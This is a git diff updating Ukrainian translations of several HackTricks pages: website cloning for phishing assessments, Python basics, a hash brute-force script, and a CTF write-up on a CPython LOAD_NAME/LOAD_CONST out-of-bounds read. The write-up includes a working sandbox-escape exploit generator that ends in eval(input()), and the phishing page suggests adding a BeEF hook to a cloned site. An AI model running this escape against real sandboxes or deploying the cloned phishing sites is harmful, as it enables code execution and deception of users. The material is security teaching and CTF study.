-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} + +
+ +{% embed url="https://websec.nl/" %} -Для оцінки ризику фішингу іноді може бути корисно повністю **клонувати веб-сайт**. + +Для оцінки рибалки іноді може бути корисним повністю **клонувати веб-сайт**. Зверніть увагу, що ви також можете додати деякі корисні навантаження на клонований веб-сайт, наприклад, гачок BeEF для "контролю" вкладки користувача. -Існують різні інструменти, які можна використовувати для цієї мети: +Існують різні інструменти, які можна використовувати для цієї цілі: ## wget ```text wget -mk -nH ``` ## goclone + +### Клонування веб-сайту + +Клонування веб-сайту - це процес створення точної копії веб-сайту з метою використання її для фішингу або зловмисних цілей. ```bash #https://github.com/imthaghost/goclone goclone ``` -## Набір інструментів соціальної інженерії +## Набір соціальної інженерії ```bash #https://github.com/trustedsec/social-engineer-toolkit ``` +
+ +{% embed url="https://websec.nl/" %} + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/python/basic-python.md b/generic-methodologies-and-resources/python/basic-python.md index 1eac7628b..937b88317 100644 --- a/generic-methodologies-and-resources/python/basic-python.md +++ b/generic-methodologies-and-resources/python/basic-python.md @@ -1,30 +1,31 @@ # Основи Python +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакінг-трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або групи [**telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Основи Python ### Корисна інформація list(xrange()) == range() --> У Python3 range є xrange у Python2 (це не список, а генератор)\ -Різниця між Tuple та List поляга в тому, що позиція значення в кортежі надає йому значення, а списки - це просто упорядковані значення. Кортежі мають структури, а списки - порядок. +Відмінність між Tuple та List полягає в тому, що позиція значення в кортежі має значення, а списки - це просто упорядковані значення. У кортежах є структури, а у списків - порядок. ### Основні операції Для піднесення числа використовується: 3\*\*2 (не 3^2)\ -Якщо ви виконуєте 2/3, воно повертає 1, оскільки ви ділите два цілих числа (integers). Якщо ви хочете десяткові числа, ви повинні ділити числа з плаваючою комою (2.0/3.0).\ +Якщо ви виконуєте 2/3, воно повертає 1, оскільки ви ділите два цілих числа (integers). Якщо ви хочете десяткові числа, вам слід ділити числа з плаваючою комою (2.0/3.0).\ i >= j\ i <= j\ i == j\ @@ -46,7 +47,7 @@ isinstance(1, int) = True\ "abcdef".contains("abc") = True\ "abc\n".strip() = "abc"\ "apbc".replace("p","") = "abc"\ -dir(str) = Список всіх доступних методів\ +dir(str) = Список усіх доступних методів\ help(str) = Визначення класу str\ "a".upper() = "A"\ "A".lower() = "a"\ @@ -67,7 +68,7 @@ sorted(\[1,43,5,3,21,4]) "qwertyuiop"\[:-1] = 'qwertyuio' **Коментарі**\ -\# Коментар у одному рядку\ +\# Коментар у один рядок\ """\ Кілька рядків коментаря\ Ще один\ @@ -93,54 +94,54 @@ for letter in "hola": ``` ### Кортежі -t1 = (1,'2,'three')\ -t2 = (5,6)\ +t1 = (1, '2', 'three')\ +t2 = (5, 6)\ t3 = t1 + t2 = (1, '2', 'three', 5, 6)\ -(4,) = Singelton\ -d = () пустий кортеж\ -d += (4,) --> Додавання в кортеж\ -CANT! --> t1\[1] == 'New value'\ -list(t2) = \[5,6] --> З кортежу у список +(4,) = Одиночний\ +d = () порожній кортеж\ +d += (4,) --> Додавання до кортежу\ +НЕ МОЖЛИВО! --> t1\[1] == 'Нове значення'\ +list(t2) = \[5, 6] --> З кортежу у список ### Список (масив) -d = \[] пустий\ -a = \[1,2,3]\ -b = \[4,5]\ -a + b = \[1,2,3,4,5]\ -b.append(6) = \[4,5,6]\ -tuple(a) = (1,2,3) --> Зі списку у кортеж +d = \[] порожній\ +a = \[1, 2, 3]\ +b = \[4, 5]\ +a + b = \[1, 2, 3, 4, 5]\ +b.append(6) = \[4, 5, 6]\ +tuple(a) = (1, 2, 3) --> Зі списку у кортеж ### Словник -d = {} пустий\ -monthNumbers={1:’Jan’, 2: ‘feb’,’feb’:2}—> monthNumbers ->{1:’Jan’, 2: ‘feb’,’feb’:2}\ -monthNumbers\[1] = ‘Jan’\ -monthNumbers\[‘feb’] = 2\ -list(monthNumbers) = \[1,2,’feb’]\ -monthNumbers.values() = \[‘Jan’,’feb’,2]\ +d = {} порожній\ +monthNumbers={1:'Jan', 2: 'feb','feb':2}—> monthNumbers ->{1:'Jan', 2: 'feb','feb':2}\ +monthNumbers\[1] = 'Jan'\ +monthNumbers\['feb'] = 2\ +list(monthNumbers) = \[1, 2, 'feb']\ +monthNumbers.values() = \['Jan', 'feb', 2]\ keys = \[k for k in monthNumbers]\ a={'9':9}\ -monthNumbers.update(a) = {'9':9, 1:’Jan’, 2: ‘feb’,’feb’:2}\ +monthNumbers.update(a) = {'9':9, 1:'Jan', 2: 'feb','feb':2}\ mN = monthNumbers.copy() #Незалежна копія\ -monthNumbers.get('key',0) #Перевірка наявності ключа, Повертає значення monthNumbers\["key"] або 0, якщо його не існує +monthNumbers.get('key',0) #Перевірка наявності ключа, Повертає значення monthNumbers\["key"] або 0, якщо його немає -### Множина +### Множини У множинах немає повторень\ myset = set(\['a', 'b']) = {'a', 'b'}\ myset.add('c') = {'a', 'b', 'c'}\ myset.add('a') = {'a', 'b', 'c'} #Без повторень\ -myset.update(\[1,2,3]) = set(\['a', 1, 2, 'b', 'c', 3])\ -myset.discard(10) #Якщо присутній, видалити, якщо ні, нічого\ -myset.remove(10) #Якщо присутній, видалити, якщо ні, виклик винятку\ +myset.update(\[1, 2, 3]) = set(\['a', 1, 2, 'b', 'c', 3])\ +myset.discard(10) #Якщо присутній, видалити, якщо нічого\ +myset.remove(10) #Якщо присутній, видалити, якщо нічого, викликати виняток\ myset2 = set(\[1, 2, 3, 4])\ myset.union(myset2) #Значення myset АБО myset2\ myset.intersection(myset2) #Значення в myset ТА myset2\ myset.difference(myset2) #Значення в myset, але не в myset2\ myset.symmetric\_difference(myset2) #Значення, які не в myset ТА myset2 (не в обох)\ myset.pop() #Отримати перший елемент множини та видалити його\ -myset.intersection\_update(myset2) #myset = Елементи в обох myset та myset2\ +myset.intersection\_update(myset2) #myset = Елементи як в myset, так і в myset2\ myset.difference\_update(myset2) #myset = Елементи в myset, але не в myset2\ myset.symmetric\_difference\_update(myset2) #myset = Елементи, які не в обох @@ -176,10 +177,10 @@ return self.idNum < other.idNum ``` ### map, zip, filter, lambda, sorted та однорядкові вирази -**Map** працює так: \[f(x) для x в ітерабельному] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\ +**Map** це як: \[f(x) для x в ітерабельному] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\ m = map(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) --> \[False, False, True, False, False, True, False, False, True] -**zip** зупиняється, коли закінчується коротший з foo або bar: +**zip** зупиняється, коли коротший з foo або bar зупиняється: ``` for f, b in zip(foo, bar): print(f, b) @@ -199,7 +200,7 @@ class Car: crash = lambda self: print('Boom!') my_car = Car(); my_car.crash() = 'Boom!' ``` -mult1 = \[x для x в \[1, 2, 3, 4, 5, 6, 7, 8, 9] якщо x%3 == 0 ] +mult1 = \[x для x в \[1, 2, 3, 4, 5, 6, 7, 8, 9\] якщо x%3 == 0 ] ### Винятки ``` @@ -217,7 +218,7 @@ print “executing finally clause in any case” ``` ### Assert() -Якщо умова є хибною, рядок буде виведено на екран +Якщо умова є хибною, рядок буде надрукований на екрані ``` def avg(grades, weights): assert not len(grades) == 0, 'no grades data' @@ -225,12 +226,13 @@ assert len(grades) == 'wrong number grades' ``` ### Генератори, yield -Генератор, замість повернення чогось, "подає" щось. Коли ви звертаєтеся до нього, він "повертає" перше згенероване значення, після чого ви можете звернутися до нього знову, і він поверне наступне згенероване значення. Таким чином, всі значення не генеруються одночасно, і використання цього може заощадити багато пам'яті порівняно зі списком усіх значень. +Генератор, замість повернення чогось, "подає" щось. Коли ви звертаєтеся до нього, він "повертає" перше згенероване значення, після цього ви можете звертатися до нього знову, і він поверне наступне згенероване значення. Таким чином, всі значення не генеруються одночасно, і використання цього може заощадити багато пам'яті порівняно зі списком усіх значень. ``` def myGen(n): yield n yield n + 1 ``` +```markdown g = myGen(6) --> 6\ next(g) --> 7\ next(g) --> Помилка @@ -257,7 +259,7 @@ $ --> Закінчується на\ **Опції:**\ re.search(pat,str,re.IGNORECASE)\ IGNORECASE\ -DOTALL --> Дозволяє крапці відповідати новому рядку\ +DOTALL --> Дозволяє крапці відповідати символу нового рядка\ MULTILINE --> Дозволяє ^ та $ відповідати на різних рядках re.findall("<.\*>", "\foo\and\so on\") = \['\foo\and\so on\']\ @@ -279,12 +281,13 @@ from itertools import **combinations** --> Генерує всі можливі print(list(**combinations**('123',2))) --> \[('1', '2'), ('1', '3'), ('2', '3')] **combinations\_with\_replacement**\ -from itertools import **combinations\_with\_replacement** --> Генерує всі можливі комбінації від символу далі (наприклад, 3-й змішаний з 3-го і далі, але не з 2-го або першого)\ +from itertools import **combinations\_with\_replacement** --> Генерує всі можливі комбінації від символу далі (наприклад, 3-й змішаний з 3-го далі, але не з 2-го або першого)\ print(list(**combinations\_with\_replacement**('1133',2))) = \[('1', '1'), ('1', '1'), ('1', '3'), ('1', '3'), ('1', '1'), ('1', '3'), ('1', '3'), ('3', '3'), ('3', '3'), ('3', '3')] ### Декоратори -Декоратор, який визначає час, який потрібно виконати функцію (з [тут](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)): +Декоратор, який визначає час, необхідний для виконання функції (з [тут](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)): +``` ```python from functools import wraps import time @@ -302,22 +305,23 @@ return wrapper def decorated_func(): print("Decorated func!") ``` -Якщо ви запустите це, ви побачите щось схоже на наступне: +Якщо ви запустите його, ви побачите щось схоже на наступне: ``` Let's call our decorated function Decorated func! Execution time: 4.792213439941406e-05 seconds ``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md b/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md index 3c8b9504e..c80178c05 100644 --- a/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md +++ b/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ```python import hashlib @@ -61,16 +62,17 @@ return 0 main() ``` +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або групи [**telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md b/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md index e5a94f707..003b02acd 100644 --- a/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md +++ b/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md @@ -1,26 +1,27 @@ -# Зчитування за межі масиву (OOB Read) опкоду LOAD\_NAME / LOAD\_CONST +# Зчитування опкоду LOAD\_NAME / LOAD\_CONST для OOB читання + +{% hint style="success" %} +Вивчайте та вправляйтесь в хакінгу AWS: [**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та вправляйтесь в хакінгу GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} **Ця інформація була взята** [**з цього опису**](https://blog.splitline.tw/hitcon-ctf-2022/)**.** ### TL;DR -Ми можемо використовувати функціонал зчитування за межі масиву (OOB read) в опкоді LOAD\_NAME / LOAD\_CONST, щоб отримати деякий символ у пам'яті. Це означає використання трюку типу `(a, b, c, ... сотні символів ..., __getattribute__) if [] else [].__getattribute__(...)` для отримання символу (наприклад, назви функції), який вам потрібен. +Ми можемо використовувати функціонал OOB читання в опкоді LOAD\_NAME / LOAD\_CONST, щоб отримати деякий символ у пам'яті. Це означає використання трюку типу `(a, b, c, ... сотні символів ..., __getattribute__) if [] else [].__getattribute__(...)` для отримання потрібного символу (наприклад, назви функції), який вам потрібен. -Потім просто створіть свій експлоіт. +Потім просто створіть свій експлойт. ### Огляд @@ -31,15 +32,11 @@ if len(source) > 13337: exit(print(f"{'L':O<13337}NG")) code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=()) print(eval(code, {'__builtins__': {}}))1234 ``` -Ви можете ввести довільний код Python, і він буде скомпільований у [об'єкт коду Python](https://docs.python.org/3/c-api/code.html). Однак `co_consts` та `co_names` цього об'єкта коду будуть замінені порожньою кортежкою перед оцінкою цього об'єкта коду. - -Таким чином, усі вирази, що містять константи (наприклад, числа, рядки тощо) або імена (наприклад, змінні, функції) можуть призвести до виходу за межі пам'яті в кінцевому підсумку. - -### Вихід за межі читання +### Виход за межі читання Як відбувається збій сегментації? -Давайте розпочнемо з простого прикладу, `[a, b, c]` може бути скомпільований у наступний байт-код. +Давайте почнемо з простого прикладу, `[a, b, c]` може скомпілюватися в наступний байт-код. ``` 1 0 LOAD_NAME 0 (a) 2 LOAD_NAME 1 (b) @@ -47,11 +44,11 @@ print(eval(code, {'__builtins__': {}}))1234 6 BUILD_LIST 3 8 RETURN_VALUE12345 ``` -Але що, якщо `co_names` стане порожнім кортежем? Опкод `LOAD_NAME 2` все ще виконується, і намагається прочитати значення з тієї адреси пам'яті, з якої він початково мав бути. Так, це функція зчитування за межами меж "функція". +Проте що, якщо `co_names` стає порожнім кортежем? Опкод `LOAD_NAME 2` все одно виконується і намагається прочитати значення з тієї адреси пам'яті, з якої воно початково мало б бути. Так, це функція зчитування "за межами меж". -Основна концепція рішення проста. Деякі опкоди в CPython, наприклад `LOAD_NAME` та `LOAD_CONST`, уразливі (?) для OOB read. +Основна концепція рішення проста. Деякі опкоди в CPython, наприклад `LOAD_NAME` та `LOAD_CONST`, є вразливими (?) на OOB read. -Вони отримують об'єкт з індексом `oparg` з кортежу `consts` або `names` (це те, що приховано під назвами `co_consts` та `co_names`). Ми можемо звернутися до наступного короткого відрізка коду про `LOAD_CONST`, щоб побачити, що робить CPython, коли він обробляє опкод `LOAD_CONST`. +Вони отримують об'єкт з індексом `oparg` з кортежу `consts` або `names` (це те, що приховано під назвами `co_consts` та `co_names`). Ми можемо звернутися до наступного короткого відрізка про `LOAD_CONST`, щоб побачити, що робить CPython під час обробки опкоду `LOAD_CONST`. ```c case TARGET(LOAD_CONST): { PREDICTED(LOAD_CONST); @@ -61,12 +58,12 @@ PUSH(value); FAST_DISPATCH(); }1234567 ``` -### Генерація експлоіту +Таким чином ми можемо використовувати функціонал OOB, щоб отримати "ім'я" з довільного зміщення пам'яті. Щоб переконатися, яке це ім'я та яке його зміщення, просто продовжуйте спробувати `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... І ви можете знайти щось приблизно з oparg > 700. Ви також можете спробувати використати gdb, щоб краще розібратися у структурі пам'яті, звісно, але я не думаю, що це буде простіше? -Таким чином ми можемо використовувати функціонал OOB для отримання "імені" з довільного зміщення пам'яті. Щоб переконатися, яке це ім'я і яке його зміщення, просто продовжуйте спробувати `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... І ви можете знайти щось приблизно oparg > 700. Ви також можете спробувати використовувати gdb, щоб краще розібратися в пам'яті, звичайно, але я не думаю, що це буде простіше? +### Генерація Експлоіту -Як тільки ми отримаємо ці корисні зміщення для імен / констант, як ми _можемо_ отримати ім'я / константу з цього зміщення і використовувати його? Ось для вас хитрість:\ -Давайте припустимо, що ми можемо отримати ім'я `__getattribute__` з зміщенням 5 (`LOAD_NAME 5`) з `co_names=()`, тоді просто виконайте наступні дії: +Після того, як ми отримали корисні зміщення для імен / констант, як ми _можемо_ отримати ім'я / константу з цього зміщення та використовувати його? Ось хитрість для вас:\ +Давайте припустимо, що ми можемо отримати ім'я `__getattribute__` зі зміщенням 5 (`LOAD_NAME 5`) з `co_names=()`, тоді просто виконайте наступні дії: ```python [a,b,c,d,e,__getattribute__] if [] else [ [].__getattribute__ @@ -75,7 +72,7 @@ FAST_DISPATCH(); ``` > Зверніть увагу, що не обов'язково називати його `__getattribute__`, ви можете назвати його якось коротше або дивніше -Ви можете зрозуміти причину цього, просто переглянувши його байткод: +Ви можете зрозуміти причину, просто переглянувши його байткод: ```python 0 BUILD_LIST 0 2 POP_JUMP_IF_FALSE 20 @@ -101,11 +98,11 @@ FAST_DISPATCH(); * 2: (not \[]) + (not \[]) * ... -### Скрипт експлойту +### Сценарій експлойту -Я не використовував константи через обмеження на довжину. +Я не використовував константи через обмеження довжини. -Спочатку ось скрипт, за допомогою якого ми знайдемо ці зміщення імен. +Спочатку ось скрипт для пошуку цих зміщень імен. ```python from types import CodeType from opcode import opmap @@ -140,7 +137,7 @@ print(f'{n}: {ret}') # for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132 ``` -І наступне призначене для створення реального Python експлоіту. +І наступне призначене для створення реального Python експлойту. ```python import sys import unicodedata @@ -230,16 +227,17 @@ getattr( '__repr__').__getattribute__('__globals__')['builtins'] builtins['eval'](builtins['input']()) ``` +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Школа хакінгу HackTricks для експертів червоної команди AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Школа хакінгу HackTricks для експертів червоної команди GCP (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
